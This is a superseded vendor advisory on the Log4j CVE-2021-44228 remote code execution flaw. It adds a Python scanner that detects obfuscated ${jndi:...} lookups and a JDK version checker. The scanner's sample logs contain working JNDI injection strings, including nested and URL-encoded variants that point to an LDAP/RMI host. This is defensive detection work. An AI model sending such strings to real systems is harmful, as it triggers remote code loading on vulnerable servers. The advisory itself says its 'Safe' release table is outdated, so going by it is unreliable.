EIQ-2021-0016

ID

EIQ-2021-0016

CVE

CVE-2021-44228

Description

Superseded by EIQ-2021-0016-2.

Log4j versions earlier than 2.15 have a remote code execution vulnerability.

Date

10 December 2021

Updated 14 December 2021

Severity

See EIQ-2021-0016-2

CVSSv3 score

10.0

Status

See EIQ-2021-0016-2

Assessment

11 December 2021: Superseded by EIQ-2021-0016-2.

Mitigations described here are no longer relevant.

This is a developing situation. For updated advice, see EIQ-2021-0016-2.

Log4j versions earlier than 2.15 are vulnerable to CVE-2021-44228: when attacker-controlled input (for example an HTTP header) reaches a log message, the message formatter evaluates `${jndi:...}` lookups in it. The lookup contacts an attacker-controlled LDAP server through JNDI (Java Naming and Directory Interface), retrieves an object reference from it, and can result in remote code execution in the logging application.
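
As an added detection example (not EclecticIQ code and not part of the original advisory), the following Python flags log lines that carry such a lookup. Because the lookup is evaluated by Log4j's own interpolator, attackers hide `jndi` behind nested `${lower:}`, `${upper:}` and `${name:-default}` lookups and URL encoding; the scanner collapses those the way Log4j would before matching. The log lines, IP addresses and ports are constructed samples.

```python
"""Flag log lines carrying a CVE-2021-44228 ${jndi:...} lookup string."""
import re
import urllib.parse

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A jndi lookup once its nested pieces have been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(match):
    """Evaluate one innermost lookup the way Log4j's Interpolator would."""
    body = match.group(1)
    prefix, _, value = body.partition(":")
    prefix = prefix.strip().lower()
    if prefix == "jndi":
        return match.group(0)          # keep the resolved jndi lookup intact
    if prefix == "lower":
        return value.lower()
    if prefix == "upper":
        return value.upper()
    if ":-" in body:                   # ${env:NaN:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    return body                        # unknown lookup: expose its text


def normalize(line, max_rounds=20):
    """URL-decode, then collapse nested lookups from the inside out."""
    text = urllib.parse.unquote(line)
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_resolve_inner, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_jndi_probe(line):
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalised line) for every line carrying a jndi lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_jndi_probe(l)]


# Constructed access-log samples (User-Agent is the last quoted field); not real traffic.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fa%7D"',
    '10.0.0.5 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${date:yyyy} harmless lookup"',
]

if __name__ == "__main__":
    for index, shown in scan(SAMPLE_LOGS):
        print(index, shown)
```

Matching on the collapsed form rather than on the raw string is the point: a plain `jndi` substring match misses the nested and URL-encoded variants, and a rule that fires on any `${` is too noisy because benign lookups such as `${date:yyyy}` also appear in logs.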

At the time of this assessment, the exploit was considered mitigated in the Intelligence Center releases listed below because each bundles a JDK whose default JNDI settings refuse to load remote classes from an LDAP-supplied codebase (a status that the superseding advisory EIQ-2021-0016-2 revisits):

Intelligence Center release   Status   Bundled JDK
2.11.0                        Safe     1.8.0_312-b07
2.10.3                        Safe     1.8.0_312-b07
2.10.2                        Safe     1.8.0_302-b08
2.10.1                        Safe     1.8.0_302-b08
2.10.0                        Safe     1.8.0_292-b10
2.9.3                         Safe     1.8.0_282-b08
2.9.2                         Safe     1.8.0_282-b08
2.9.1                         Safe     1.8.0_282-b08
2.9.0                         Safe     1.8.0_275-b01

Your system is still vulnerable if it runs one of these JDK (Java Development Kit) versions, whose defaults still allow JNDI to load remote classes:

  • 6u211 and earlier

  • 7u201 and earlier

  • 8u191 and earlier

  • 11.0.1 and earlier
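
As an added example (not EclecticIQ code and not part of the original advisory), the following Python checks a JDK version string against the list above. It understands both the legacy `1.8.0_312` form and the `11.0.1` form, returns True for updates the advisory lists as still vulnerable, and returns None for JDK families the advisory does not mention (9, 10, 12 and later) rather than calling them safe. The `check_local_java` helper, which runs `java -version` on the host, is an assumption about how the check would be used and is not exercised by the samples.

```python
"""Check JDK version strings against the JDK list in this advisory."""
import re
import subprocess

# Highest update per family that the advisory lists as still vulnerable.
VULNERABLE_UP_TO = {6: (211,), 7: (201,), 8: (191,), 11: (0, 1)}

# Bundled JDKs from the Intelligence Center release table above.
BUNDLED_JDK = {
    "2.11.0": "1.8.0_312-b07", "2.10.3": "1.8.0_312-b07",
    "2.10.2": "1.8.0_302-b08", "2.10.1": "1.8.0_302-b08",
    "2.10.0": "1.8.0_292-b10", "2.9.3": "1.8.0_282-b08",
    "2.9.2": "1.8.0_282-b08", "2.9.1": "1.8.0_282-b08",
    "2.9.0": "1.8.0_275-b01",
}

_LEGACY = re.compile(r"^1\.(\d+)\.0(?:_(\d+))?")          # 1.8.0_312-b07
_MODERN = re.compile(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?")   # 11.0.1, 17.0.2, 11
_VERSION_LINE = re.compile(r'version "([^"]+)"')           # first line of `java -version`


def parse_version(version):
    """Return (family, update_tuple), or None if the string is not a JDK version."""
    version = version.strip().strip('"')
    m = _LEGACY.match(version)
    if m:
        return int(m.group(1)), (int(m.group(2) or 0),)
    m = _MODERN.match(version)
    if m:
        return int(m.group(1)), (int(m.group(2) or 0), int(m.group(3) or 0))
    return None


def listed_as_vulnerable(version):
    """True/False per the advisory's JDK list; None when the family is not listed."""
    parsed = parse_version(version)
    if parsed is None:
        return None
    family, update = parsed
    limit = VULNERABLE_UP_TO.get(family)
    if limit is None:
        return None
    return update <= limit


def version_from_java_output(output):
    """Pull the quoted version out of `java -version` output (written to stderr)."""
    m = _VERSION_LINE.search(output)
    return m.group(1) if m else None


def bundled_jdk_status():
    """Map each Intelligence Center release to the check on its bundled JDK."""
    return {rel: listed_as_vulnerable(jdk) for rel, jdk in BUNDLED_JDK.items()}


def check_local_java():
    """Run the check against the java binary on PATH; (None, None) if absent."""
    try:
        proc = subprocess.run(["java", "-version"], capture_output=True, text=True)
    except FileNotFoundError:
        return None, None
    version = version_from_java_output(proc.stderr + proc.stdout)
    return version, (listed_as_vulnerable(version) if version else None)


if __name__ == "__main__":
    for rel, status in bundled_jdk_status().items():
        verdict = "listed as vulnerable" if status else "above the listed threshold"
        print(rel, BUNDLED_JDK[rel], verdict)
    print(check_local_java())
```

The check only reproduces the list in this advisory; it says nothing about the Log4j version itself, and a JDK above the listed updates is not on its own a reason to treat a host as safe (see EIQ-2021-0016-2).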

More information:

Mitigation

-

Affected versions

2.11.x – 2.9.x

Notes

N/A